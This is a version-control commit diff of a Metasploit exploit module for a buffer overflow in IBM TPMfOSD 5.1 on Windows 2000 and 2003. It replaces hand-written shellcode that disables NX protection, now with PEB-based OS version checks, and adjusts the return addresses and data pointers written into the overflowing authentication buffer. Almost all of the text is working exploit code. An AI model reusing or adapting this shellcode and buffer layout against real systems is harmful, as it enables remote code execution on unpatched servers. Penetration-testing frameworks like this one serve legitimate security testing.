From topo:
1) It uses the rembo.exe Data section to prevent a crash. 2) The prepend code has been modified to disable NX only on 2K3 SP1-2 (otherwise it crashes 2K3 SP0). git-svn-id: file:///home/svn/framework3/trunk@4863 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
88d3193020
commit
3604c87c22
@ -39,17 +39,22 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
'Prepend' =>
# Disable NX on 2k3 to upload data on the stack
# (service crashes if the stack is switched to the heap)
"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
"\x80\x39\x02" + # cmp byte ptr [ecx], 2
"\x75\x15" + # jmp after
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
"\x6a\x04" + # push 4
"\x51" + # push ecx
"\x6a\x22" + # push 22
"\x6a\xff" + # push -1
"\x6a\xff" + # push -1 (padding)
"\xff\x12", # call dword ptr[edx]
"\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
"\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
"\x75\x30" + # jnz after
"\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
"\x75\x27" + # jnz after
"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
"\x76\x1b" + # jbe after
"\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
"\x6a\x04" + # push 4
"\x51" + # push ecx
"\x6a\x22" + # push 22
"\x6a\xff" + # push -1
"\x6a\xff" + # push -1 (padding)
"\xff\x12", # call dword ptr[edx]
'StackAdjustment' => -3500,
},
'Platform' => 'win',
@ -57,7 +62,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
[
['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],
# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000 }],
['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],
],
'DisclosureDate' => 'May 02 2007',
'DefaultTarget' => 0))
@ -88,7 +93,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
# retn
auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')
auth[ 2100, 4 ] = [ ib + 0x11010 ].pack('V')
auth[ 2100, 4 ] = [ target['Data'] ].pack('V')
auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')
auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')